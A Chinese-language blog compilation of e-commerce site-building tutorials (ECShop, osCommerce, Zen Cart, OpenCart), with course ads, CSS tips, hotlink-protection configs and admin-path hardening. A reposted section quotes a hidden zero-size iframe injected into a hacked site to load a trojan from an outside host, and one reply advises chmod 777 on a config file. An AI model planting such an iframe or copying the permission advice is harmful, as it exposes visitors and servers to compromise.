好消息公告:【最新購物網站架站教學】購物網站購物車五大天王:osCommerce、Twe-Commerce、Zen Cart、xt:Commerce、ecshop 實況錄影架站教學課程已經完成製作,保有【osCommerce最完整購物網站架站教學】DVD課程郵寄到府函授課程外,另增加購物車四大天王:Twe-Commerce、Zen Cart、xt:Commerce、ecshop 實況架站線上錄片架站教學
(份量增加很多價格還是不變!)限期30天。
最新課程表:http://por.tw/sale/cmmerse-4-all/index.php


特訓密技基地總教頭
ster168ster@gmail.com
English Sentence Loading...
英語句子加載中...
瀏覽模式: 普通 | 清單
【文章主題】: 揭開:購物網站【ECShop】的首頁輪播動態圖片廣告的技術秘密
【文章作者】: 購物網站架站.經營教學密訓基地-總教頭
【作者信箱】:
steven8ster@gmail.com
【作者網站】: http://por.tw/sale
【主題分類】: 購物車.購物網站【ECShop】
【第二網站】:
http://visdacom.com/sale
【版權聲明】: 原創於【購物網站架站.經營教學密訓基地】-可轉載!請保持文章完整。刪除部分者依法追究!
--------------------------------------------------------------------------------
【主題內容】
  揭開:購物網站【ECShop】的首頁輪播動態圖片廣告的技術秘密
  最近大加一定發現我的網站首頁增加了:輪播動態圖片廣告的看板
  看來好像跟購物網站【ECShop】的首頁輪播動態圖片廣告很類似
 
請注意:這是我自己的作品(可不是套用購物網站【ECShop】的首頁輪播動態圖片廣告模組喔!)
  請看:我在最難搞的Google的【blogger】部落格(網路賺錢技術觀察站)也掛上這樣的廣告!

  網址是:
http://ebook369.blogspot.com
  
attachments/200903/7416196768.gif

  啊!怎麼弄的?能不能教教大家?這就是台灣人錯愛大陸購物網站【ECShop】的第一步
 
因為一般人部會製作Flash動畫!又例如:目前的台灣TWE-commerce 3.0安裝後有Flash官方動畫
 
笨蛋還以為跟購物車.購物網站【ECShop】一樣(可以自己更換廣告圖片及連結點)
  仔細到後台一看(大失所望...沒有!)一般人不知道怎麼加上去
  只好再次冒著版權不明(商業與非商業使用)的苦惱....繼續使用購物車.購物網站【ECShop】
  最近有很多網友寫信給我,說他的購物車.購物網站【ECShop】被駭客入侵
(懷疑八成是:阿陸仔搞的鬼..)
  哈哈!我教學中還有教很多購物車可用(為何獨鐘購物車購物網站【ECShop】呢?難道想投奔中共不成?)
  開玩笑啦!不要講政治!生意人只講:經濟(不講政治!)

 
 
言歸正傳!來分析講解:購物車.購物網站【ECShop】的首頁輪播動態圖片廣告模組的作動方式
  此種:Flash廣告的結構有Flash檔案(副檔名為:SWF)通常作者設計好了以後使用者不用管它
  此Flash廣告圖片SWF檔是呼叫外部圖片(一般的Flash都是包在裡頭,要改就要有原始檔很不實用)
  那圖片大小與連結的廣告網址(連結位址)是使用:XML的檔案(用一般文字輸入即可)
  XML告訴Flash檔案(副檔名為:SWF)圖片的路徑與連結點,這樣幫然方便使用者可以自己更改!
  圖片更換時的轉換畫面Flash檔案(副檔名為:SWF)會自己去執行
 
  最後當然再使用一個頁面HTML(或PHP.ASP)把他呈現出來(夠簡單吧!)
 
那要在部落格顯現來做:部落格行銷呢?那當然是使用HTML或JAVA的語言程式碼把它弄上去!
  所以為何要花錢學技術呢?因為大家都不是:網站程式的本科系畢業或有朋友有此專長
  請一般網站設計公司很貴(自己還是不會)受限於人的生意怎麼做?
  技術就是這樣:會的不難,不會的比登天還難!
邊工作賺錢邊進修技術一舉兩得
  因為網路是目前的主流趨勢,學會本領就不用看人臉色了!
  為了遏止盜版及拷貝歪風!購物網站函授課程的註冊學員有問題(總教頭)提供技術諮詢.......

在本地端安裝 AppServ 整合包軟體之後
你的網站首頁路徑就是 C: /AppServ /www
所以你不用FTP軟體上傳檔案(直接將檔案複製到 C:  /AppServw /ww 即可安裝)
因為沒有網址,所以只要在網址列輸入:http://localhost/ 就可以看到首頁
可以將 C: /AppServ /wwwindex.php 的index.php檔案換成你的首頁檔案index.php或index.html
資料庫管理,可以在網址列輸入:http://localhost/phpMyAdmin/


attachments/201304/3477799553.png
--------------------------------------------------------------------------------
【文章標題】: 架站網站本地端測試與遠端架站(專業名詞解釋)
【文章作者】: 購物網站架站教學密訓基地
【作者信箱】: ster168ster@gmail.com
【作者首頁】: http://por.tw/sale/
【購物網站架站教學課程】: http://por.tw/sale/cmmerse-4-all/index.php
【基地主機】: http://goto1688.com/sale/
【版權聲明】: (原創)購物網站架站教學密訓基地,轉載必須保留完整標頭。刪除者依法追究!
--------------------------------------------------------------------------------


租用虛擬主機空間,你開取得的資料(專業名詞解釋)
Domain:(網址、網域)
例如:goto.uphero.com
在瀏覽器網址列輸入:http://topadmin.ucart.tw
-------------------------------------------------
Username:(使用者名、用戶名稱)
例如:a9561621
Password:(密碼)
通常是指:你申購租用時輸入的密碼
例如: ***********
為何會是 *********** 呢?
因為租用後,通知是使用電子郵件通知(怕被駭客網路中途攔截)
-------------------------------------------------
Disk Usage:    0 / 1500.0 MB
磁碟使用情況
----------------------------------
Bandwidth     100000 MB (100GB)
頻寬(流量)
----------------------------------
Home Root     /home/a9561621
首頁路徑
----------------------------------
Server Name     server46.000webhost.com
伺服器名稱
IP Address     31.170.160.110
主機 IP
Apache ver.     2.2.19 (Unix)
Apache 版本
PHP version     5.2.*
PHP 版本
MySQL ver.     5.1
MySQL 資料庫版本
Activated On     2013-04-24 11:56
Status     Active
何時啟用?
-----------------------------------------------
$mysql_host = "mysql16.000webhost.com";
MySQL 資料庫伺服器名稱
$mysql_database = "a9561621_01";
MySQL 資料庫名稱
$mysql_user = "a9561621_hong";
MySQL 使用者名稱
$mysql_password = "************";
MySQL 登入密碼
-----------------------------------------------
FTP host name:goto.uphero.com
使用 FTP 軟體上傳檔案的主機名稱(有些是IP)
FTP user name:a9561621
使用 FTP 軟體上傳檔案的使用者名稱
FTP password:"************"
使用 FTP 軟體上傳檔案登入密碼
Folder to upload files     public_html
使用 FTP 軟體上傳檔案(首頁目錄)
-----------------------------------------------
如何進入虛擬主機(Cpanel)控制台?
例如:
Control panel username:ucart_12904432
Control panel password:"************"
Control panel URL
    http://cpanel.ucart.tw
-----------------------------------------------
備註:你要進入控制台phpMyAdmin 路徑?
例如:
http://sql16.000webhost.com/phpMyAdmin/index.php
-----------------------------------------------

你在自己摸索如何架設購物網站.經商.網路賺錢嗎?您有【技術顧問服務】可諮詢嗎?
有問題無法解決要發很多時間處理(或許永遠找出答案)是自己摸索購物架站痛苦的開始!
購買【購物網站架站教學】DVD課程,就可獲得【購物網站架站】技術【顧問諮詢服務】!

購物網站osCommerce 的外掛模組 osCommerce Affiliate 加盟廣告經銷商模組
osCommerce 的外掛模組 osCommerce Affiliate

osCommerce-加盟廣告經銷商Affiliate是從osCommerce Affiliate 1.0的基礎開始發展的
 
目前最新的版本是:osC Affiliate v2.8(英文版)

osC Affiliate的下載網址:

http://www.oscommerce.com/

要繁體中文語系可以從:languages中的english(英文語系)翻譯成繁體中文化版
目前網路上還找不到有國人翻譯發佈分享(有看到的網友請通知我)免得我重複翻譯...
最近比較沒空,等有空時我再來繁體中文化osCommerce Affiliate。
---------------------------------------------------------------------------
購物網站osCommerce外掛Affiliate(加盟廣告經銷商)詳細功能說明如下:
例如:
A-為經銷商
        B-為購物網站
        C-為顧客
一般加盟廣告經銷商有兩種方式:
加盟廣告經銷商的第一種方式:A與B之間關係為:
A提供B產品,請B幫他賣。
而B則記錄(本程式的功用)C的瀏灠及購買行為
A可以進入後台察看是否有瀏灠或購買B的產品
A從購買中向B抽取佣金

加盟廣告經銷商的第二種方式:
B提供A網站Banner(廣告看板)
(有些人以為osCommerce外掛Affiliate(加盟廣告經銷商)有此功能,實裝上去後發現不是這麼一回事)
Banner(廣告看板)放在A的網站上
B依Banner在A網站上的點擊數支付佣金

備註:osCommerce外掛Affiliate安裝要修正程式碼(要有程式碼修改經驗)並不是上傳檔案覆蓋就可以了,很多人是門外漢(當然就安裝不起來!)

Zen Cart購物車最好重新CSS的font-size的控制(em與px的差異)模版修改CSS教學

 本文章的標題是「Zen Cart購物車需要重寫CSS」,標題有點嚇人,但是Zen Cart購物車在使用中文的台灣或中國確實是網頁設計方面的一些缺陷
很多人直也搞不清楚px與em之間的關係和特點,看過本文章以後您確實會收穫很大。
平時都是用px來定義字型,所以無法用瀏覽器字型拉近的功能,而國外大多數網站都可以在IE下使用。
因為:
1. IE無法調整那些使用px作為單位的字型大小;
2. 國外的大部分網站能夠調整的原因在於其使用了em作為字型單位;
3. Firefox能夠調整px和em,但是96%以上的國內訪客使用IE瀏覽器(或內核)。
px像素(Pixel)。相對長度單位。像素px是相對於顯示器螢幕解析度而言的。
em是相對長度單位。相對於現用的物件內文字的字型尺寸。
如現用的對行內文字的字型尺寸未被人為設定,則相對於瀏覽器的預設字型尺寸。

任意瀏覽器的預設字型高都是16px。
所有未經調整的瀏覽器都符合: 1em=16px。
那麼12px=0.75em, 10px=0.625em。

為了簡化font-size的換算,需要在css中的body選取器中聲明Font-size=62.5%,這就使em值變為16px*62.5%=10px, 這樣12px=1.2em, 10px=1em, 也就是說只需要將你的原來的px數值除以10,然後換上em作為單位就行了。

em有如下特點:
1. em的值並不是固定的;
2. em會繼續父級元素的字型大小。

所以我們在寫CSS的時候,需要注重:
1. body選取器中聲明Font-size=62.5%;
2. 將你的原來的px數值除以10,然後換上em作為單位;
3. 重新計算那些被拉近的字型的em數值。避免字型大小的重複聲明。
也就是避免1.2 * 1.2= 1.44的現象。
比如說你在#content中聲明了字型大小為1.2em,那麼在聲明p的字型大小時就只能是1em,而不是1.2em, 因為此em非彼em,它因繼續#content的字型高而變為了1em=12px。

但是12px漢字例外,就是由以上方法得到的12px(1.2em)大小的漢字在IE中並不等於直接用12px定義的字型大小,而是稍大一點。
這個問題只需在body選取器中把62.5%換成63%就能標準顯示了。
原因可能是IE處理漢字時,對於浮點的取值精確度有限。
所以這是修改Zen Cart購物車你如果還是會覺得中文字怪怪的,就必須揮時間去修改Zen Cart購物車的CSS
Zen Cart購物車的CSS路徑為:
你的購物網站目錄/includes/templates/你後台選用的模版/css目錄
裡面有五個檔案,分別是:

print_stylesheet.css
schinese_stylesheet.css
style_imagehover.css
stylesheet.css
stylesheet_css_buttons.css
其中最主要的是:stylesheet.css
當然您要網站一致性,其他四個CSS也不能忽視不修改。

【文章標題】: 購物網站加入網路串流影片,動態影片:就如自設網路電視購物台!
【文章作者】: 購物網站架站經營密訓基地-總教頭
【作者信箱】:
steven8ster@gmail.com
【作者首頁】: http://por.tw/sale
【內容分類】: 購物網站加入網路串流影片影片.FLV語法
【基地主機】:
http://visdacom.com/sale
【版權聲明】: 本文【原創】購物網站架站經營密訓基地,轉載必須保留完整標頭。刪除者依法追究!
--------------------------------------------------------------------------------
【文章內容】
  購物網站或網站網頁(如何加入網路串流影片影片.FLV)語法範例
 
  購物網站及一般商業網站通常是:以文字說明與商品圖片為主。
  如果有網路串流影片影片.FLV的說明會更有展示的效果!
  購物網站加入網路串流影片,動態影片:就如自設網路電視購物台!

  
  attachments/200905/4126406365.jpg
  
 
那該如何加入呢?技術問題敘述如下:
  購物網站或網站網頁(如何加入網路串流影片影片.FLV)其方法有二:
  第一種方法:
  網路上有些人教你把影片上傳到 YouTube 再將語法嵌入到你的網頁中
  此中方法的優點是:因為使用語法嵌入,所以不會佔用你的網站流量及伺服器的負荷
  但是他的缺點是:
  1.上面有一個YouTube的LOGO很礙眼
(沒有自己的企業形象可言...好像在替YouTube打免費廣告)
  2.萬一訪客用滑鼠左鍵直接點擊畫面兩次,網頁會跳到YouTube的官方網站
  有些訪客因此就在YouTube看影片(客人跑掉啦!)
  你想:有沒有像趕客人走?真冤!客人來了卻又走了,
生意沒做成...錢當然也沒賺到!

  第二種方法是:自己將影片放在自己網站主機上,其方法如下: 
 
  1.先將拍好的影片剪接、上字幕、配音及特效處理後轉存成.FLV格式的影片
  (要記住影片的高度及寬度)
  2.將剪接編輯好的影片,上傳.FLV的影片到虛擬主機後(請記住網址)
 
  3.開啟網頁編輯軟體:Macromedia Dreamweaver
  新增加一個新的HTML網頁選擇:插入→媒體→Flash視迅
    輸入相關設定後切換到程式碼
    將程式碼複製(用文字編輯器貼上後,存檔備用)
     
  4.將HTML檔案存檔(他會新增加一個SWF檔案)
  將HTML檔案與新增加一個SWF檔案也上傳至主機
   
  5.在「新上架商品」的時候, 先打好介紹的說明文字。
 
  6.要加入商品的說明影片時,在編輯器上找到切換到「HTML」語法
  在你想要加入的合適位址貼上下列語法即可!
 
  我在教學範例網站增加一範例,網址如下:
 
 
http://por.tw/shopping/product_info.php?products_id=1
 
  我也錄製一個實際教學影片(有加密),僅供學員下載
  學員注意:解壓縮密法
與函授課程檔案解壓縮密碼相同
  非學員就不用下載了!因為無解壓縮密碼下載也沒用!
  學員下載網址: (教學檔案很大,共計:80.5MB)
 
 
http://por.tw/Downloads/FLV-up.rar

osCommerce 第一次安裝出現錯誤處理

【文章標題】: osCommerce 第一次安裝出現錯誤處理
【文章作者】: 購物網站架站經營密訓基地-總教頭
【作者信箱】:
steven8ster@gmail.com
【作者首頁】: http://por.tw/sale
【內容分類】: 學員來函(技術諮詢處理)
【基地主機】:
http://visdacom.com/sale
【版權聲明】: 本文【原創】購物網站架站經營密訓基地,轉載必須保留完整標頭。刪除者依法追究!
--------------------------------------------------------------------------------
【文章內容】
  osCommerce 第一次安裝出現錯誤處理方法

 
  學員來函(技術諮詢處理)
  學員之問題:
  osCommerce 第一次安裝出現錯誤處理
  osCommerce 設定
  發生下列錯誤:
  設定檔(configure.php)不存在,或檔案權限未設定。

attachments/200904/5163389639.gif
  
  (技術諮詢處理)回覆:
  Unix-like OS 請執行下列動作:
  cd /安裝檔案路徑/includes/
  touch configure.php
  變更屬性 706 configure.php
  cd /安裝檔案路徑/admin/includes/
  touch configure.php
  變更屬性 706 configure.php
 
  如果變更屬性 706 仍然發生錯誤,
請試變更屬性 777.
 
 
如果你是在 Microsoft Windows 的環境下安裝,請將已經存在的設定檔(configure.php)變更檔名,以便產生新檔。
  或取消該檔案的"唯讀"屬性

除了五大購物車之外,購物網站您還有另一個選擇,那就是:OpenCart 繁體中文版
OpenCart購物車是近年最受矚目的開源購物商城系統,當初由英國人Daniel一人獨立開發
簡單易操作且針對搜尋引擎做最佳化處理,多國語言的特點,讓各國網友陸續翻譯出來的語言包已經超過20種
其中包括中文、俄文、法文、西班牙文、德文、日文等等。
Dnono 網站針對OpenCart 1.4.8版本開始提供OpenCart中文版,從安裝到使用全都是中文介面,後台管理則是提供雙語顯示
中文旁邊保留原英文,方便大家在尋找資源時更容易比對和查詢,也為了更符合我們華人中文用語使用的習慣
一部分英文沒有直接按照英文的字面翻譯。原本認為簡單的翻譯工作,實際操作時才發覺並不容易
希望各位愛好者在使用的同時也能幫忙來推廣OpenCart,讓更多人受惠,也別忘了常常回來加入討論和提供意見,施比受更有福啊!
OpenCart中文版下載說明

    安裝完成後,前後台語言即是中文
    貨幣新增新台幣和人民幣並設為內定版本,安裝完馬上可用
    保留原英文語言檔案,如需使用可自行安裝
    安裝方式和原版本相同,並內附中文安裝說明
    檔案為免費提供下載使用,為確保來源請核對MD5碼

備註:此說明與檔案轉載來自 blog.Dnono.com

attachments/201304/9478425498.png

----------------------------------------------------------
版本:1.5.5.1
繁體中文:http://blog.dnono.com/downloads/Dnono_oc1551_TW.zip
文件大小:7.7 MB
----------------------------------------------------------
您若需要討論區資源,可以登入:
OpenCart 中文社群:opencart.tw
http://www.opencart.tw/forum.php
有網友互助與討論,總比你自己摸索可少走很多冤枉路!
網路有熱心人世無私的付出與分享,讓更多人得到幸福!

---------------------------------------------------------

【文章標題】: 使用 Twe-Commerce3.0 購物網站 如何修改頁腳下的版權字串
【文章作者】: 購物網站架站經營密訓基地-總教頭
【作者信箱】:
steven8ster@gmail.com
【作者首頁】: http://por.tw/sale
【內容分類】: 學員來函(技術諮詢處理)
【基地主機】:
http://visdacom.com/sale
【版權聲明】: 本文【原創】購物網站架站經營密訓基地,轉載必須保留完整標頭。刪除者依法追究!
--------------------------------------------------------------------------------
【文章內容】
  英文學習捲動跑馬燈如何製作及運用在網站的方法
 
  學員來函(技術諮詢處理)
  學員之問題:

  使用 Twe-Commerce3.0 購物網站 如何修改頁腳下的版權字串
 
  我現在使用 Twe-Commerce3.0 購物網站
  請問如何修改頁腳下的版權字串?


attachments/200905/9920180172.gif

  總不可能一直用Twe-commerce還連結去官方
  我的購物網站法律行為總不可能叫別人負責吧?

 
 
  (技術諮詢處理)回覆:
  尋找 'text_footer 在 安裝網址目錄lang chineselang_tchinese.conf'
 
  大約在429行位置:
  text_footer = '<br>copyright 2005 <a href="
http://www.twecommerce.org"> Twe-commerce </a><br>'
 
  修改成:
  text_footer = '<br>copyright 2009 <a href="http://你的網址"> 你的網站名稱 </a><br>'

  注意:如果你有使用其他語系,請依照此方法修改其他語系檔案(方法相同)

強化osCommerce安全性(改變後台登入路徑)

  駭客要攻擊你的網站,首先當然是先確認該網站是使用何種架站程式架站的?
  再找到該架站程式預設的後台路徑(例如:osCommerce的後台登入目錄是admin)
  這就好像小偷要進入你家,先又找到進入的大門
  再來使用駭客工具軟體測試你登入的帳號與密碼(你有圖片確認碼也沒用,因為現在還是有掃圖碼程式)
  當駭客破解你後台的帳號與密碼後,就可以大搞破壞的犯罪行為!

attachments/201205/8046540155.jpg

  那您應該怎樣防範駭客登入後台的破解呢?
  今天總教頭以osCommerce的購物網站為例,修改後台登入路徑(讓駭客找不到後台登入的路徑,就像小偷找不到『鑰匙孔』嘿嘿要開鎖談何容易?)
  如果您是使用osCommerce程式,為了避免入侵問題嚴重,總教頭建議所有使用者做以下的改善,增加您網站的安全性,同時以增加主機的安全性。
 
  我建議您:馬上將您的osCommerce購物車後台目錄名稱改掉,將原本的admin資夾變更成難猜的資料夾名稱,嘿嘿!連後台登入的大門(路徑)都找不到,還想測試出帳號與密碼?
 
  修改後台路徑的方法:
 
  1.使用WinSCP、FTP或虛擬主機業者的CPANEL的檔案管理功 ,能將osCommerce預設的後台admin目錄改成難猜的名稱
  例如:Topadmin369(名稱請自行命名,反正讓駭客很難猜中)
 
  2.將 admin 資料夾中 include 資料夾中 configure.php 裡的底下兩行
 
  define(‘DIR_WS_ADMIN’, ‘/admin/’); // 後台目錄路徑
  define(‘DIR_FS_ADMIN’, ‘/home/您租用虛擬主機帳號/public_html/admin/’); // 主機安裝的絕對路徑

 
  上方兩行中admin部份你要變更成您命名的資料夾名稱。
  如果您是獨立主機,那第二行就要用你的主機安裝路徑(你自己依照實際修改即可!)
 
  這樣,你osCommerce購物網站後台登入路徑就只有你知道,再加上帳號與密碼才能登入
  (強化oscommerce安全性)
  很簡單吧?您馬上動手修改吧!讓您osCommerce的購物網站多一層防護!
----------------------------------------------------------------------------------------
【文章作者】: 購物網站架站經營密訓基地-總教頭
【作者信箱】: steven8ster@gmail.com
【作者首頁】: http://por.tw/sale
【教學課程】: http://por.tw/sale/cmmerse-4-all/index.html
【基地主機】: http://visdacom.com/sale
【版權聲明】: 本文【原創】購物網站架站經營密訓基地,轉載必須保留完整標頭。刪除者依法追究!

-----------------------------------------------------------------------------------------
你還在自己摸索如何架設購物網站網路開店賺錢嗎?你有【技術顧問服務】可以諮詢嗎?
往往問題無法解決你可能要發很多時間處理(或許永遠找出答案)那就是自己摸索架站痛苦的開始!
購買【購物網站】課程錄影課程,你就可獲得【購物網站網路開店賺錢】技術【顧問諮詢服務】!

[轉貼] ECSHOP防盜連及駭客iframe攻擊模式

原著:http://bbs.ecshop.tw/thread-593-1-1.html

一.網站防盜連
首先,防盜連只防君子不防小人,所以認真說還是有辦法被破解
在 Apache 中可以用 .htaccess 來做一些簡單的安全性、認證相關的設定。
開啟 httpd.conf 後,將下面這行修改一下,再新啟動 Apache
AllowOverride None 改成 AllowOverride All

防盜連常見方法一
轉自PCZONE
那麼請在.htaccess檔案加入下面
(以下這樣設定代表:除了自己網站以及PCZONE網站,其他網站仍無法盜連你站內的資料)
SetEnvIfNoCase Referer "^http://www.pczone.com.tw/" local_ref=1
SetEnvIfNoCase Referer "^http://pczone.com.tw/" local_ref=1
SetEnvIfNoCase Referer "^http://自己網站/" local_ref=1
SetEnvIfNoCase Referer "^http://www.google.com/" local_ref=1
SetEnvIfNoCase Referer "^http://google.com/" local_ref=1
<FilesMatch ".(txt|doc|gif|jpg|mp3)"> 
Order Allow,Deny
Allow from env=local_ref
Allow from google.com
Allow from 127.0.0.1
Allow from 202.43.85.163 <-這個IP,是PCZONE網站的固定IP
</FilesMatch>

另一改 httpd.conf 方法
<Directory "C:/Apache2/htdocs/XXXXX">
SetEnvIfNoCase Referer "^http://www.yahoo.com.tw/" local_ref=1
<FilesMatch ".(gif|jpg|wmv|wma|swf|rm|rmvb|mp3|mid|exe|zip)">
Order Allow,Deny
Allow from env=local_ref
Allow from 127.0.0.1
Allow from
http://www.yahoo.com/
Allow from http://www.yahoo.com.tw/
</FilesMatch>
</Directory>

讓 kuso.in/kuso/x.php 限制連 這個 php 不能直接連結.除了自己網站和yahoo
用 Location 來指出該檔案url 位置
<Location /kuso/x.php>
order allow,deny
Allow from 127.0.0.1
Allow from
http://www.yahoo.com/
Allow from http://www.yahoo.com.tw/
......
</Location>

同理.封鎖特定的IP做這些設定
<FilesMatch ".x">
order deny,allow
allow from all
deny from 192.168.1
deny from 192.168.2.1
</FilesMatch>


.htaccess 放的位置也會有差別,.htaccess 的作用範圍,只有放置該檔的目錄,以及其下的子目錄才會有作用。是目錄不是網址喔。如果其它的目錄已經有另外設定過權限的話,要檢查一下權限有沒有衝突。

下面是白話文-linux下 參考範例 轉自
更改前 這個是帶 rewrite 的
<VirtualHost *:80>
DocumentRoot /home/www
ServerName
http://www.yourdomin.com/
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteRule ^/supesite/([0-9]+)/spacelist(.*)$ /supesite/index.php?$1/action_spacelist$2
RewriteRule ^/supesite/([0-9]+)/viewspace_(.+)$ /supesite/index.php?$1/action_viewspace_itemid_$2
RewriteRule ^/supesite/([0-9]+)/viewbbs_(.+)$ /supesite/index.php?$1/action_viewbbs_tid_$2
RewriteRule ^/supesite/([0-9]+)/(.*)$ /supesite/index.php?$1/$2
RewriteRule ^/supesite/([0-9]+)$ /supesite/index.php?$1
RewriteRule ^/supesite/action_(.+)$ /supesite/index.php?action_$1
RewriteRule ^/supesite/category_(.+)$ /supesite/index.php?action_category_catid_$1
RewriteRule ^/supesite/itemlist_(.+)$ /supesite/index.php?action_itemlist_catid_$1
RewriteRule ^/supesite/viewnews_(.+)$ /supesite/index.php?action_viewnews_itemid_$1
RewriteRule ^/supesite/viewthread_(.+)$ /supesite/index.php?action_viewthread_tid_$1
RewriteRule ^/supesite/index([.a-zA-Z0-9]*)$ /supesite/index.php
</IfModule>
</VirtualHost>

改完後
<VirtualHost *:80>
DocumentRoot /home/www
ServerName
http://www.yourdomin.com/
SetEnvIfNoCase Referer "^http://www.yourdomin.com" local_ref=1
SetEnvIfNoCase Referer "^http://yourdomin.com" local_ref=1
<FilesMatch ".(txt|doc|mp3|zip|rar|jpg|gif)">
Order Allow,Deny
Allow from env=local_ref
</FilesMatch>
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteRule ^/supesite/([0-9]+)/spacelist(.*)$ /supesite/index.php?$1/action_spacelist$2
RewriteRule ^/supesite/([0-9]+)/viewspace_(.+)$ /supesite/index.php?$1/action_viewspace_itemid_$2
RewriteRule ^/supesite/([0-9]+)/viewbbs_(.+)$ /supesite/index.php?$1/action_viewbbs_tid_$2
RewriteRule ^/supesite/([0-9]+)/(.*)$ /supesite/index.php?$1/$2
RewriteRule ^/supesite/([0-9]+)$ /supesite/index.php?$1
RewriteRule ^/supesite/action_(.+)$ /supesite/index.php?action_$1
RewriteRule ^/supesite/category_(.+)$ /supesite/index.php?action_category_catid_$1
RewriteRule ^/supesite/itemlist_(.+)$ /supesite/index.php?action_itemlist_catid_$1
RewriteRule ^/supesite/viewnews_(.+)$ /supesite/index.php?action_viewnews_itemid_$1
RewriteRule ^/supesite/viewthread_(.+)$ /supesite/index.php?action_viewthread_tid_$1
RewriteRule ^/supesite/index([.a-zA-Z0-9]*)$ /supesite/index.php
</IfModule>
</VirtualHost>

防盜連常見方法補充 ~另一種防盜方法
這種我還沒試過.有試過的請發表一下
租空間的用戶,透過Apache的.htaccess來設置防盜連功能(anti hotlink),是最方便的
RewriteEngine on
RewriteCond %{HTTP_REFERER} !^http://yblog.org/*$ [NC]
RewriteCond %{HTTP_REFERER} !^http://yblog.org/$ [NC]
RewriteCond %{HTTP_REFERER} !^http://www.yblog.org/*$ [NC]
RewriteCond %{HTTP_REFERER} !^http://www.yblog.org/$ [NC]
RewriteRule .*.(jpg|gif|png|bmp|rar|zip|exe)$ /content/no_hotlink.jpeg [R,NC]
如果你想在自己的網站主機上也使用這樣的防盜連功能,生成一個.htaccess文件放到你欲限制的目錄(根目錄最好避免,在根目錄使用的. htaccess建議用作其它用途,欲限制的目錄下才放本文設定的防盜連方式)。在Windows平台上如果發現自己無法產生.htaccess文件,可 以用記事本或其它的文字編輯軟體,另存新檔時,檔名選擇.htaccess即可
RewriteCond可指定從哪些域名來連線是許可的
RewriteRule則指定哪些附檔名類型不能被盜連(hotlink),後面可指定連結到某個錯誤訊息頁面,或是一張圖片。
如果RewriteRule這一行設定成RewriteRule .(jpg|jpeg|gif|png|bmp|rar|zip|exe)$ - [F],則表示盜連的人,會看到403錯誤訊息,顯示禁止存取(403 Forbidden)。

防盜連的PHP代碼[轉自163.com]
<?php

$ADMIN[defaulturl] = "http://www.163.com/404.htm";//盜鏈返回的地址
$okaysites = array("
http://www.163.com/","http://163.com/"); //白名單
$ADMIN[url_1] = "
http://www.163.com/download/";//下載地點1
$ADMIN[url_2] = "";//下載地點2,以此類推

$reffer = $HTTP_REFERER;
if($reffer) {
$yes = 0;
while(list($domain, $subarray) = each($okaysites)) {
if (ereg($subarray,"$reffer")) {
$yes = 1;
}
}
$theu = "url"."_"."$site";
if ($ADMIN[$theu] AND $yes == 1) {
header("Location: $ADMIN[$theu]/$file");
} else {
header("Location: $ADMIN[defaulturl]");
}
} else {
header("Location: $ADMIN[defaulturl]");
}

?> 
使用方法:將上述代碼保存為dao4.php,
比如測試用的validatecode.rar在站點
http://163.com/download裡面,
則用以下代碼表示下載連接. 
文件名?site=1&file=文件 
EXP:
http://www.cndw.com/dao4.php?site=1&;file=validatecode.rar

防框架嵌入方法和源代碼 轉自
<script type="text/javascript"><!--
if ( top.location !== self.location ) {
top.location=self.location;
}
//--></script>唯一的缺點是對禁用Javascript的瀏覽器無效,不管怎麼樣這是我看到的最好的解決辦法,在這裡強烈推薦!


二.駭客攻擊(iframe)
先引用資安論壇網友:
這是我的網站,因為會員反應說有木馬程式,可是我和主機商一直找不出來,想請各位幫忙
會員幫我偵出來是Troian horse病毒。
昨天有會員反應被人植入木馬程式,檢看原始碼發現多了下面代碼
<iframe src="
http://www.photosh.idv.tw/admin/board/_vti_cnf/index.htm" width="0" height="0" frameborder="no" border="0" marginwidth="0" marginheight="0" scrolling="no"></iframe>

找了一些index.htm和index.php不過都找不到這段原始碼,請問它應該是放在哪裡呢?
and再多問一個,會員向我反應後我一邊找網站檔案還是仍然找不到,一邊掃我電腦的毒不過我用了兩三個掃木馬的程式還是都掃不出來?我的網站目前被惡意放 進的程式(如上面的代碼)還沒移除,我還是一直在我的網站上東看西看,不知是程式掃不出來還是沒有中毒?請問這種情形上去的話一定會中毒嗎?因為我也沒有 安裝任何防毒軟體,只有掃毒軟體。
我剛剛下載了一個檢測伺服器木馬及惡意程式的safe程式,放在網站上執行,它說99%可以找出惡意程式,但我使用後還是都說正常....這種情形該怎麼辦呢?主機商叫我從資料庫搜尋相關字眼但也找不到~麻煩高手幫忙一下~~QQ"

請您先把資料庫的所以密碼用英數亂碼加大小寫編碼...把密碼先改過一次...然後去看是那一個論壇..使用的是那一個資料庫...搜尋 </iframe> .....就會找到你說的那些資料了..看到多少全都砍了...
通常不會只發生在你現在這個資料庫而已...還會在你主機的另外的資料庫上...
只要你的網站夠熱門...就有人會想破你的資料庫植入以上的內崁式木馬...只要到你的論壇後...他會自動連結到別的網站..就中標了.....我有幫一位朋友開一個論壇...他的密碼太過簡單而被破後...接著就所有的資料庫都被植入類似的木碼網站..

<iframe是html的內置框架,也就是會讀對方的程式進來,不過他的高跟寬都設為0所以看不見,我也遇到,除了寫html檔之外可能會寫入flash檔,感染html或是asp相關網頁的檔案..

解析iFrame攻擊手法 .請參考這裡一篇文章 計世網

可能影響 -Google搜尋你的網站出現「這個網站可能會損害你的電腦」
當遇上網路釣魚.惡意網站連結...等同時,還可能遇到 Google搜尋出現「這個網站可能會損害你的電腦」情況
以下解決方式請自行到R大 的 慢條斯理的溫柔 去看 .雖然文中只提到遭到攻擊然後植入怪怪的連結.個人猜也許是iFrame攻擊手法 .不過也許不是.但是.遇到 Google搜尋出現「這個網站可能會損害你的電腦」這種情況 ..可ˇ以參考R大方式處理

osCommerce 安裝時Session 儲存於→選擇【檔案】與【資料庫】之差異?

有很多人在安裝osCommerce購物是網站程式架設購物時,糊里糊塗
亂按下一步
結果在安裝後發生警告字串(Session 找不到目錄夾!)
因為是英文,初學者或是看不懂警告語的意思的人,就不知道怎樣處理?
甚至想要自己架設購物網站的夢想就因此無法前進了!真是可惜!
其實這問題是出現在安裝時的『session 的儲存方式』

attachments/201109/7492380643.png

Session 儲存於:選擇 session 的儲存方式,如果選擇檔案,必須在設定檔內定義儲存的目錄及路徑且必須在主機該路徑下建立該目錄 (/tmp or c: mp)
若選擇 mysql【資料庫】 方式,則 seesion 會存入資料庫。
你這下子懂了吧?
Session 儲存於:預設是檔案
所以不選擇就亂按下一步,到最後當然要自己在本地端或虛擬主機有自己建立 (/tmp or c: mp)目錄夾!不然就會出現發生警告字串(Session 找不到目錄夾!)
